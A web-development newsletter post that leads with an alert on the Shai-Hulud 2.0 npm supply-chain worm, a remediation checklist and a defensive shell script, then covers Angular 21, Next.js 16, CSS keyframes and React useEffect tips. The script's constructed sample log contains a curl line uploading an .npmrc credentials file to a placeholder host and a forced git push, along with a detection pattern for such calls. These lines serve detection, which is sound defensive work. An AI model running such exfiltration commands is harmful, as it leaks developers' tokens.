Security alerts and new releases

Hello readers, this month, reality shifted for the JavaScript ecosystem. While we usually love sharing new features, security comes first.
We are leading this edition with a critical alert regarding the recent massive supply-chain attack on the NPM registry. Following that, we have the latest updates on Angular 21, Next.js 16, and architectural tips for your CSS and React workflows.
Here is what you need to know and - more importantly - what you need to do.
Massive NPM supply-chain attack (Shai-Hulud 2.0)
The JavaScript ecosystem is facing a major campaign - often labeled Shai-Hulud 2.0 - that trojanizes packages to steal developer tokens.
Why this is different: Unlike typical malware, this attack uses wormable propagation. Infected packages harvest CI/dev credentials and use them to publish new malicious versions to other repositories, accelerating the spread. Because these scripts execute on local developer machines and CI runners, your internal infrastructure is at risk.
The "Product Builder" defense checklist: If you manage a JS/TS stack, we recommend running this remediation immediately:
- Stop risky installs: Temporarily disable lifecycle scripts in your environment.
- Command: npm install --ignore-scripts
- Freeze updates: Hold off on installing newly published versions of packages until they are verified.
- Inspect CI logs: Search your builds for unexpected outbound requests or git pushes immediately following an npm install.
- Rotate credentials: If you suspect exposure, rotate your npm, GitHub, and cloud tokens immediately.
Pro tip: For long-term hardening, use SCA tools such as Snyk or GitHub Advanced Security and configure your CI pipeline to fail the build whenever a high-risk dependency is detected.
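To make the first and third checklist items concrete, here is a small POSIX shell example added for this edition; it is not code from the original post, from npm, or from any tool mentioned above. It assumes only awk, grep and mktemp. The build log it scans is constructed for the example, and the package name, hostnames and paths in it are placeholders.

```shell
#!/bin/sh
# Added example for the checklist above; not code from the original post.
# Assumes a POSIX shell with awk, grep and mktemp. Log content is constructed.

# Checklist item 1: make --ignore-scripts the default for this checkout by
# recording ignore-scripts=true in the project's .npmrc. Idempotent, so it is
# safe to run at the start of every CI job.
harden_npmrc() {
  npmrc="${1:-.npmrc}"
  if [ -f "$npmrc" ] && grep -q '^ignore-scripts=true$' "$npmrc"; then
    return 0
  fi
  printf 'ignore-scripts=true\n' >> "$npmrc"
}

# Checklist item 3: print every line that follows an "npm install" / "npm ci"
# and looks like an outbound network call or a git push. npm's own
# WARN/notice/ERR! lines are skipped because they routinely contain URLs.
# Exit status 1 when at least one suspicious line was found, 0 otherwise.
scan_ci_log() {
  awk '
    /(^|[ \t])npm (install|ci)([ \t]|$)/ { after = 1; next }
    after && !/^npm (WARN|notice|ERR!)/ &&
      /(curl|wget|git push|https?:\/\/)/ { print NR ": " $0; hits++ }
    END { if (hits > 0) exit 1; exit 0 }
  ' "$1"
}

# Constructed build log (placeholder names): one legitimate npm warning,
# then a postinstall script that phones home and pushes to git.
write_sample_log() {
  cat > "$1" <<'EOF'
$ npm install
npm WARN deprecated some-lib@1.0.0: see https://registry.example.invalid/advisory
added 312 packages in 4s
> some-package@1.2.3 postinstall
> node setup.js
curl -s https://collector.example.invalid/upload -d @/home/runner/.npmrc
git push --force origin HEAD:refs/heads/backup
$ npm test
EOF
}

# Usage when run directly: harden a throwaway checkout and scan the sample log.
tmp=$(mktemp -d)
harden_npmrc "$tmp/.npmrc"
write_sample_log "$tmp/build.log"
if scan_ci_log "$tmp/build.log"; then
  echo "no suspicious post-install activity"
else
  echo "suspicious post-install activity found; rotate tokens (checklist item 4)"
fi
rm -rf "$tmp"
```

The pattern list in scan_ci_log is deliberately short and is a starting point, not a complete detector: extend it with whatever your own build steps never legitimately do after an install. Any hit should be treated as a possible credential exposure and trigger the rotation step in the checklist.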
Read the full analysis and incident playbook here.
What’s new in Angular 21?
The Angular team has released version 21, continuing their momentum toward a lighter, faster developer experience.
- Signal-based forms: A major shift introducing a new reactive form primitive, making form state significantly easier to reason about.
- MCP Server support: Optimizes how LLMs interpret and utilize Angular-specific features.
- Zoneless by default: The final removal of zone.js means better performance and easier debugging.
- Vitest integration: Now the default test runner, offering faster execution out of the box.
Read the official announcement here.
Next.js 16 has landed
A popular React-based framework just received a major update packed with features for scaling products:
- Cache Component: New explicit caching APIs give you finer control over data freshness - crucial for high-traffic SaaS products.
- Turbopack Stability: Now the default for development and builds, promising significantly faster iteration cycles.
- DevTools MCP Server: Better integration for AI-assisted workflows.
Check out the release notes here.
Better architecture: Organizing CSS animation keyframes
In large-scale product builds, global CSS definitions often lead to clashes and duplication.
Keyframes are necessary to define animation steps, but they don't have to be messy. Check out a guide on how to treat CSS like software logic - creating reusable, modular keyframe definitions that keep your codebase clean.
Learn how to reuse keyframes effectively here.
Common useEffect mistakes in React
The useEffect hook is powerful, but it is also the source of many performance bottlenecks and infinite loops in React applications.
Are you over-fetching data? Missing dependency arrays? See a breakdown of the most common anti-patterns we see in code reviews and how to refactor them for stability.
Fix your React hooks here.
More blogs focused on security coming soon!
I am at the forefront of Hotovo's web technology stream, striving to stay up to date with the latest web technologies and trends, and always willing to help others master this ever-evolving industry. Outside of the world of web technology, I am an avid hiker and devoted coffee lover. I take great pleasure in seeking out new coffee shops and trying different coffee blends. I am all about innovation, whether in technology or in my cup of coffee!